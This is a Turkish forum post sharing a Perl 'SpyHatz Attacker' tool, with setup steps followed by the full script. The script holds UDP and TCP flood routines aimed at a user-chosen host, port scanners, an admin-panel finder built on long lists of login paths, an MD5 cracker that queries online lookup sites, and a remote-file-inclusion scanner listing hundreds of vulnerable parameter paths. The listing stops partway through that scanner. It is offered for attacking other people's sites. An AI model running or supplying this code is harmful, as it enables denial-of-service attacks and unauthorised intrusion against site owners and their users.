Neler yeni
MEGAForum - Teknoloji Forumu

Forum içeriğine ve tüm hizmetlerimize erişim sağlamak için foruma kayıt olmalı yada giriş yapmalısınız. Forum üye olmak tamamen ücretsizdir.

Hedef Site Açık Tarayıcı ve Dos Saldırısı [Perl]

Ritsa

Bayan Üye
MFC Üyesi
  • Üyelik Tarihi
    5 Nis 2013
  • Mesajlar
    955
  • MFC Puanı
    1
sx1yd.png


sx1zn.png


sx203.png


Kullanım Bilgisayarım C:/Perl/Bin Gelin yeni metin belgesi açıp kodları oraya yapıştırın ardından farklı kayıt et istediğinisim.pl farklı kayıt et sonra
cmd bu kodları yazın
cd..
cd..
cd perl
cd bin
perl istediğinisim.pl
Sonra aşadaki gibi menü gelecek

Not=Expoliti çalıştırmak için perl programına ihtiyaçınız vardır İndir Burdan pc göre indire bilirsiniz genilikle indirdinizde dosya adı perl(64) olur onu perl yapa bilirsiniz expolit denemedim

Kod:
#!/usr/bin/perl use IO::Socket;     Mainmenu:   print q{   ########################################## ##        SpyHatz Attacker              ## ##                                      ## ##          spyhatz.com               ## ##########################################     1. Tarama Araclari  [Scanning Tools] 2. Saldiri Araclari  [Attacking Tools] 3. Kriptografi Araclari  [Cracking Tools]   0. Exit    };     #vars my $mainmenu1; my $host; my $port; my $sock; my $size; my $yy; ################ my $target; my $port2; my $msg; my $times; my $sock1; my $yy2; ################ my $IPA; my $PS; my $PE; my $port3; my $sock2; my $yy3; ################ my $IPA2; my $PS2; my $PE2; my $port4; my $sock4; my $yy4; my $string; my $attack; my $i;       $mainmenu1 = <STDIN>;   if ($mainmenu1 == 1) {&menu2} if ($mainmenu1 == 2) {&menu3} if ($mainmenu1 == 3) {&menu4}   if ($mainmenu1 == 11) {die "SpyHatz Attackeri kullandiginiz icin tesekkurler ! / spyhatz.com";}   sub menu2 { system('clear'); print q{   ########################################## ##        SpyHatz Attacker              ## ##                                      ## ##          spyhatz.com               ## ##########################################     1. Acik TCP portlarini tara   [Scan For Open TCP Ports] 2. Acik UDP portlarini tara   [Scan For Open UDP Ports] 3. Admin Paneli Bul  [ WebSite Admin Finder ] 4. Sql kolon bul  [ SQL Column Finder  ] 5. RFI Tarayici [ RFI Scanner ] 6. LFI Tarayici [ LFI Scanner ] 7. SQL Tarayici [ SQL Scanner ] 8. XSS Tarayici    [ XSS Scanner ]   0. Ana menuye don [ Back To Main Menu ]     };     $menu2 = <STDIN>;   if ($menu2 == 1) {&portscantcp} if ($menu2 == 2) {&portscanudp} if ($menu2 == 3) {&admin_finder} if ($menu2 == 4) {&sqlfinder} if ($menu2 == 5) {&rfi_scanner} if ($menu2 == 6) {&lfi_scanner} if ($menu2 == 7) {&sql_scanner} if ($menu2 == 8) {&xss_scanner} if ($menu2 == 0) {goto Mainmenu}   } sub menu3 { system('clear'); print q{   ########################################## ##        SpyHatz Attacker              ## ##                                      ## ##          spyhatz.com               ## ##########################################     1. DDoS - UDP 2. DDoS - TCP   0. Ana menuye don [ Back To Main Menu ]     };     $menu3 = <STDIN>;   if ($menu3 == 1) {&ddosudp} if ($menu3 == 2) {&ddostcp} if ($menu3 == 0) {goto Mainmenu} }   sub menu4 { system('clear'); print q{   ########################################## ##        SpyHatz Attacker              ## ##                                      ## ##          spyhatz.com               ## ##########################################     1. MD5 KIR [MD5 CRACKER]   0. Ana menuye don [ Back To Main Menu ]     };     $menu4 = <STDIN>;   if ($menu4 == 1) {&md5_cracker} if ($menu4 == 0) {goto Mainmenu} }   sub ddosudp { print q{   ########################################### ##              DDoS - UDP              ## ###########################################     };     print "Sunucu/IP Adresi : [Host/IP Address:] "; chop ($host = <stdin>); print "Port: "; chop ($port = <stdin>);   { $sock = IO::Socket::INET->new (         PeerAddr => $host,         PeerPort => $port,         Proto => 'udp') || die "$! Ip adresinin dogru oldugundan emin olun [Make sure the IP/host or port number is correct]"; } packets: while (1) { $size = rand() * 200 * 2000; print ("Saldiri Basladi [ Start Flood ] : $host:$port saldiri boyutu [packet size]: $size\n"); send($sock, 0, $size);   print q{         };print "Menuye donmen icin Y`ye basin. [Press The Y Key To Return To Menu]\n";     $yy = <STDIN>;     if ($yy == "y") {goto Mainmenu;}    }   }   sub ddostcp {   print q{   ########################################### ##              DDoS - TCP              ## ###########################################     };   print "Sunucu/Ip Adresi [Host/IP Address] : \n> "; $target = <STDIN>; chop ($target); if ($target eq "") { die "Giris Gecersiz ! [Invalid Input!]\n"; } print "Port :\n> "; $port2 = <STDIN>; chop ($port2); if ($port2 eq "") { die "Giris Gecersiz ! [Invalid Input!]\n"; } print "Tcp Saldirisi : [Times to repeat TCP flood :]\n> "; $times = <STDIN>; chop ($times); if ($times eq "") { die "Giris Gecersiz! [Invalid Input]!\n"; } print "Enter message to send [enter for default] :\n> "; $msg = <STDIN>; chop ($msg); if ($msg eq "") { $msg = "Denied. No service for you! None!\n"; } print "[+] Checking if host exists...\n"; $string = inet_aton($target) || die "[+] Host not exists...?\n";   print "[+] Ok. $target it seems to exist...\n"; print "[+] Connecting to $target through port: $port...\n"; $sock1 = IO::Socket::INET -> new ( PeerAddr => $target, PeerPort => $port2, Proto => "tcp", Type => SOCK_STREAM, ) || die "[+] Can't Connect to $target in $port...\n"; close($sock1); print "[+] Ok. Port $port it seems to be connectable...\n"; print "[+] Send the attack (y/n) ?\n"; $attack = <STDIN>; chop ($attack); if ($attack eq "n") { die "[+] Program Exiting...\n"; } elsif ($attack eq "y") { &attack; } else { die "[+] No Such Option...\n"; }   sub attack { print "[+] Ok. Let's **** him...\n"; print "[+] Attacking $target on port $port\n"; for ($i = 0; $i <= $times; $i++) { $sock2 = IO::Socket::INET -> new ( PeerAddr => $target, PeerPort => $port2, Proto => "tcp", Type => SOCK_STREAM, ) || die "[+] Can't Connect...\n"; print $sock2 "msg"; close($sock2); } } print "[+] Attack Completed...\n"; print "Press The Y Key To Return To Menu\n";     $yy2 = <STDIN>;     if ($yy2 == "y") {goto Mainmenu;}    }     sub portscantcp {   print q{   ########################################### ##            PORT SCAN - TCP            ## ###########################################     }; print "Hedef Site / Ip adresi : "; $hostip1 = <STDIN>; chomp ($hostip1);   print "\nFirst Port: "; $firstport1 = <STDIN>; chomp ($firstport1);   print "\nLast Port: "; $lastport1 = <STDIN>; chomp ($lastport1);       if($firstport1 > $lastport1){         print "Error: min port is higher then max port\n";         &portscantcp;             }           my $i5 = $firstport1;         print "Ports to scan: $i5 - $lastport1\n\n";         while ($i5 <= $lastport1){         $host = IO::Socket::INET->new(PeerAddr=>$hostip1,PeerPort=>$i5,proto=>'tcp',Timeout=>5);         if ($host) {print "Port $i5 is open\n";         close $host;         $i5 = $i5 + 1;}                 else {         print "Port $i5 is closed\n";         close $host;         $i5 = $i5 + 1;}         }           print "Press The Y Key To Return To Menu\n";     $yy3 = <STDIN>;     if ($yy3 == "y") {goto Mainmenu;}   }           sub portscanudp {   print q{   ########################################### ##            PORT SCAN - UDP            ## ###########################################     };       print "Target Host/IP Address: "; $hostip2 = <STDIN>; chomp ($hostip2);   print "\nFirst Port: "; $firstport2 = <STDIN>; chomp ($firstport2);   print "\nLast Port: "; $lastport2 = <STDIN>; chomp ($lastport2);       if($firstport2 > $lastport2){         print "Error: min port is higher then max port\n";         &portscanudp;             }           my $i6 = $firstport2;         print "Ports to scan: $i6 - $lastport2\n\n";         while ($i6 <= $lastport2){         $host2 = IO::Socket::INET->new(PeerAddr=>$hostip2,PeerPort=>$i6,proto=>'tcp',Timeout=>5);         if ($host2) {print "Port $i6 is open\n";         close $host2;         $i6 = $i6 + 1;}                 else {         print "Port $i6 is closed\n";         close $host2;         $i6 = $i6 + 1;}         }           print "Press The Y Key To Return To Menu\n";     $yy4 = <STDIN>;     if ($yy4 == "y") {goto Mainmenu;}   }   sub admin_finder {   use HTTP::Request; use LWP::UserAgent;   system('clear');   print q{   ########################################### ##    ADMIN CONTROL PANEL FINDER        ## ###########################################     };   print "Enter websitesite to scan: "; $site=<STDIN>; chomp $site;   print "\n"; print "Enter coding language of the website(asp, php, cfm): "; $code=<STDIN>; chomp($code);   if ( $site !~ /^http:/ ) { $site = 'http://' . $site; } if ( $site !~ /\/$/ ) { $site = $site . '/'; } print "\n";   print "[*]Target: $site\n"; print "[*]WebSite Source: $code\n"; print "[*]Scanning the admin control panel in progress ...\n\n\n";   if($code eq "asp"){   @path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp', 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp', 'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp', 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp', 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp', 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html', 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp', 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp', 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html' );   foreach $ways(@path1){   $final=$site.$ways;   my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req);   if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } }         # ------------------------------------------------------- # -------------------test cfm ---------------------------| # -------------------------------------------------------           if($code eq "cfm"){   @path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm', 'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm', 'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm', 'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm', 'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm', 'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html', 'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm', 'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm', 'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html' );   foreach $ways(@path1){   $final=$site.$ways;   my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req);   if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } }           # ------------------------------------------------------- #--------------------------/test-------------------------| # -------------------------------------------------------     if($code eq "php"){   @path2=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php', 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html', 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php', 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php', 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html', 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html', 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html', 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php', 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php', 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php', 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php' );   foreach $ways(@path2){   $final=$site.$ways;   my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req);   if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } {goto Mainmenu;}   } }   sub md5_cracker {   print q{ ############################## #      MD5 CRACKER          # ##############################   };   use IO::Socket;   sub findmd5 { my ($md5, $host, $uri, $pdata, $regexp) = @_; my $pdata .= $md5; $datalen = length $pdata ; syswrite STDOUT, "\n\n\tSearching on $host "; my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp", );   if(!$sock){ print " [!] Connection time out : $!\n"; return false; } else {   print $sock "POST /$uri"."$md5"." HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "User-Agent: MoX-Zilla\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $datalen\n\n"; print $sock "$pdata\n";   while ($answer = <$sock>) { if ($answer =~ /$regexp/ ) { print "Cracked ! \n\n\n\t"; sleep(1); print "Plaintext is : ".$1."\n\n\t"; print "\t[+] Tnx to $host :P Enjoy ;) \n\n"; {goto Mainmenu;} } } close($sock); } }   print q( Kirilacak md5 hash giriniz Ornek : b2f3d1e0efcb5d60e259a34ecbbdbe00 Hash MD5: ); $hash=<STDIN>; chomp ($hash); unless($hash =~ /[0-9a-fA-Z]{32}/) {die "Bu bir md5 hash degil! :-( !\n"}; print "Taraniyor ....\n";   @sites = ( ["passcracking.ru","/index.php?xD=","datafromuser=","lor=#FF0000>(.*?)<\/td>.*?<\/td><\/"], ["md5.benramsey.com","/md5.php?hash=","","TA.(.*?)..><\/s"], ["md5.noisette.ch","/md5.php?hash=","","TA.(.*?)..><\/s"], ["gdataonline.com","qkhash.php?mode=xml&hash=","","t>(.*?)<\/re"], ["md52.altervista.org","index.php?md5=","","d: .*?ed\">[^\[](.*?)<\/font><\/b"] );   $si = 0;   foreach (@sites){ $site = $sites[$si][0]; $uri = $sites[$si][1]; $pdata = $sites[$si][2]; $regex = $sites[$si][3]; findmd5($hash,$site,$uri,$pdata,$regex); $si++; }   print "\n\nThis hash is was not found on the net, must brut-force :-(\n\n"; print "Press The Y Key To Return To Menu\n"; $yy3 = <STDIN>; if ($yy3 == "y") {goto Mainmenu;}   }     sub rfi_scanner {   use HTTP::Request; use LWP::UserAgent;   print q{   ################################# #        RFI SCANNER          # #################################   }; print "Insert Target:(ex: http://www.target.com/)\n"; $host=<STDIN>; chomp($host); print "Scanning...\n"; $rfi1="includes/header.php?systempath="; $rfi2="Gallery/displayCategory.php?basepath="; $rfi3="index.inc.php?PATH_Includes="; $rfi4="nphp/nphpd.php?nphp_config[LangFile]="; $rfi5="include/db.php?GLOBALS[rootdp]="; $rfi6="ashnews.php?pathtoashnews="; $rfi7="ashheadlines.php?pathtoashnews="; $rfi8="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR="; $rfi9="demo/includes/init.php?user_inc="; $rfi10="jaf/index.php?show="; $rfi11="inc/shows.inc.php?cutepath="; $rfi12="poll/admin/common.inc.php?base_path="; $rfi13="pollvote/pollvote.php?pollname="; $rfi14="sources/post.php?fil_config="; $rfi15="modules/My_eGallery/public/displayCategory.php?basepath="; $rfi16="bb_lib/checkdb.inc.php?libpach="; $rfi17="include/livre_include.php?no_connect=lol&chem_absolu="; $rfi18="index.php?from_market=Y&pageurl="; $rfi19="modules/mod_mainmenu.php?mosConfig_absolute_path="; $rfi20="pivot/modules/module_db.php?pivot_path="; $rfi21="modules/4nAlbum/public/displayCategory.php?basepath="; $rfi22="derniers_commentaires.php?rep="; $rfi23="modules/coppermine/themes/default/theme.php?THEME_DIR="; $rfi24="modules/coppermine/include/init.inc.php?CPG_M_DIR="; $rfi25="modules/coppermine/themes/coppercop/theme.php?THEME_DIR="; $rfi26="coppermine/themes/maze/theme.php?THEME_DIR="; $rfi28="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]="; $rfi29="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]="; $rfi30="myPHPCalendar/admin.php?cal_dir="; $rfi31="agendax/addevent.inc.php?agendax_path="; $rfi32="modules/mod_mainmenu.php?mosConfig_absolute_path="; $rfi33="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path="; $rfi34="main.php?page="; $rfi35="default.php?page="; $rfi36="index.php?action="; $rfi37="index1.php?p="; $rfi38="index2.php?x="; $rfi39="index2.php?content="; $rfi40="index.php?conteudo="; $rfi41="index.php?cat="; $rfi42="include/new-visitor.inc.php?lvc_include_dir="; $rfi43="modules/agendax/addevent.inc.php?agendax_path="; $rfi44="shoutbox/expanded.php?conf="; $rfi45="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR="; $rfi46="pivot/modules/module_db.php?pivot_path="; $rfi47="library/editor/editor.php?root="; $rfi48="library/lib.php?root="; $rfi49="e107/e107_handlers/secure_img_render.php?p="; $rfi50="zentrack/index.php?configFile="; $rfi51="main.php?x="; $rfi52="becommunity/community/index.php?pageurl="; $rfi53="GradeMap/index.php?page="; $rfi54="phpopenchat/contrib/yabbse/poc.php?sourcedir="; $rfi55="calendar/calendar.php?serverPath="; $rfi56="calendar/functions/popup.php?serverPath="; $rfi57="calendar/events/header.inc.php?serverPath="; $rfi58="calendar/events/datePicker.php?serverPath="; $rfi59="calendar/setup/setupSQL.php?serverPath="; $rfi60="calendar/setup/header.inc.php?serverPath="; $rfi61="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]="; $rfi62="zentrack/index.php?configFile="; $rfi63="pivot/modules/module_db.php?pivot_path="; $rfi64="inc/header.php/step_one.php?server_inc="; $rfi65="install/index.php?lng=../../include/main.inc&G_PATH="; $rfi66="inc/pipe.php?HCL_path="; $rfi67="include/write.php?dir="; $rfi68="include/new-visitor.inc.php?lvc_include_dir="; $rfi69="includes/header.php?systempath="; $rfi70="support/mailling/maillist/inc/initdb.php?absolute_path="; $rfi71="coppercop/theme.php?THEME_DIR="; $rfi72="zentrack/index.php?configFile="; $rfi73="pivot/modules/module_db.php?pivot_path="; $rfi74="inc/header.php/step_one.php?server_inc="; $rfi75="install/index.php?lng=../../include/main.inc&G_PATH="; $rfi76="inc/pipe.php?HCL_path="; $rfi77="include/write.php?dir="; $rfi78="include/new-visitor.inc.php?lvc_include_dir="; $rfi79="includes/header.php?systempath="; $rfi80="support/mailling/maillist/inc/initdb.php?absolute_path="; $rfi81="coppercop/theme.php?THEME_DIR="; $rfi82="becommunity/community/index.php?pageurl="; $rfi83="shoutbox/expanded.php?conf="; $rfi84="agendax/addevent.inc.php?agendax_path="; $rfi85="myPHPCalendar/admin.php?cal_dir="; $rfi86="yabbse/Sources/Packages.php?sourcedir="; $rfi87="dotproject/modules/projects/addedit.php?root_dir="; $rfi88="dotproject/modules/projects/view.php?root_dir="; $rfi89="dotproject/modules/projects/vw_files.php?root_dir="; $rfi90="dotproject/modules/tasks/addedit.php?root_dir="; $rfi91="dotproject/modules/tasks/viewgantt.php?root_dir="; $rfi92="My_eGallery/public/displayCategory.php?basepath="; $rfi93="modules/My_eGallery/public/displayCategory.php?basepath="; $rfi94="modules/4nAlbum/public/displayCategory.php?basepath="; $rfi95="modules/coppermine/themes/default/theme.php?THEME_DIR="; $rfi96="modules/agendax/addevent.inc.php?agendax_path="; $rfi97="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR="; $rfi98="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR="; $rfi99="modules/coppermine/include/init.inc.php?CPG_M_DIR="; $rfi100="modules/mod_mainmenu.php?mosConfig_absolute_path="; $rfi101="shoutbox/expanded.php?conf="; $rfi102="pivot/modules/module_db.php?pivot_path="; $rfi103="library/editor/editor.php?root="; $rfi104="library/lib.php?root="; $rfi105="e107/e107_handlers/secure_img_render.php?p="; $rfi106="main.php?x="; $rfi107="main.php?page="; $rfi108="index.php?meio.php="; $rfi109="index.php?include="; $rfi110="index.php?inc="; $rfi111="index.php?page="; $rfi112="index.php?pag="; $rfi113="index.php?p="; $rfi114="index.php?x="; $rfi115="index.php?open="; $rfi116="index.php?visualizar="; $rfi117="index.php?pagina="; $rfi118="index2.php?content="; $rfi119="inc/step_one_tables.php?server_inc="; $rfi120="GradeMap/index.php?page="; $rfi121="phpshop/index.php?base_dir="; $rfi122="admin.php?cal_dir="; $rfi123="contacts.php?cal_dir="; $rfi124="convert-date.php?cal_dir="; $rfi125="album_portal.php?phpbb_root_path="; $rfi126="mainfile.php?MAIN_PATH="; $rfi127="dotproject/modules/files/index_table.php?root_dir="; $rfi128="html/affich.php?base="; $rfi129="gallery/init.php?HTTP_POST_VARS="; $rfi130="pm/lib.inc.php?pm_path="; $rfi131="ideabox/include.php?gorumDir="; $rfi132="index2.php?includes_dir="; $rfi133="forums/toplist.php?phpbb_root_path="; $rfi134="forum/toplist.php?phpbb_root_path="; $rfi135="admin/config_settings.tpl.php?include_path="; $rfi136="include/common.php?include_path="; $rfi137="event/index.php?page="; $rfi138="forum/index.php?includeFooter="; $rfi139="forums/index.php?includeFooter="; $rfi140="forum/bb_admin.php?includeFooter="; $rfi141="forums/bb_admin.php?includeFooter="; $rfi142="language/lang_english/lang_activity.php?phpbb_root_path="; $rfi143="forum/language/lang_english/lang_activity.php?phpbb_root_path="; $rfi144="blend_data/blend_common.php?phpbb_root_path="; $rfi145="master.php?root_path="; $rfi146="includes/kb_constants.php?module_root_path="; $rfi147="forum/includes/kb_constants.php?module_root_path="; $rfi148="forums/includes/kb_constants.php?module_root_path="; $rfi149="classes/adodbt/sql.php?classes_dir="; $rfi150="agenda.php3?rootagenda="; $rfi151="agenda2.php3?rootagenda="; $rfi152="sources/lostpw.php?CONFIG[path]="; $rfi153="topsites/sources/lostpw.php?CONFIG[path]="; $rfi154="toplist/sources/lostpw.php?CONFIG[path]="; $rfi155="sources/join.php?CONFIG[path]="; $rfi156="topsites/sources/join.php?CONFIG[path]="; $rfi157="toplist/sources/join.php?CONFIG[path]="; $rfi158="topsite/sources/join.php?CONFIG[path]="; $rfi159="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath="; $rfi160="extras/poll/poll.php?file_newsportal="; $rfi161="index.php?site_path="; $rfi162="mail/index.php?site_path="; $rfi163="fclick/show.php?path="; $rfi164="show.php?path="; $rfi165="calogic/reconfig.php?GLOBALS[CLPath]="; $rfi166="eshow.php?Config_rootdir="; $rfi167="auction/auction_common.php?phpbb_root_path="; $rfi168="index.php?inc_dir="; $rfi169="calendar/index.php?inc_dir="; $rfi170="modules/TotalCalendar/index.php?inc_dir="; $rfi171="modules/calendar/index.php?inc_dir="; $rfi172="calendar/embed/day.php?path="; $rfi173="ACalendar/embed/day.php?path="; $rfi174="calendar/add_event.php?inc_dir="; $rfi175="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys="; $rfi176="claroline/auth/ldap/authldap.php?includePath="; $rfi177="docebo/modules/credits/help.php?lang="; $rfi178="modules/credits/help.php?lang="; $rfi179="config.php?returnpath="; $rfi180="editsite.php?returnpath="; $rfi181="in.php?returnpath="; $rfi182="addsite.php?returnpath="; $rfi183="includes/pafiledb_constants.php?module_root_path="; $rfi184="phpBB/includes/pafiledb_constants.php?module_root_path="; $rfi185="pafiledb/includes/pafiledb_constants.php?module_root_path="; $rfi186="auth/auth.php?phpbb_root_path="; $rfi187="auth/auth_phpbb/phpbb_root_path="; $rfi188="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]="; $rfi189="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]="; $rfi190="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]="; $rfi191="phpdig/includes/config.php?relative_script_path="; $rfi192="includes/phpdig/includes/config.php?relative_script_path="; $rfi193="includes/dbal.php?eqdkp_root_path="; 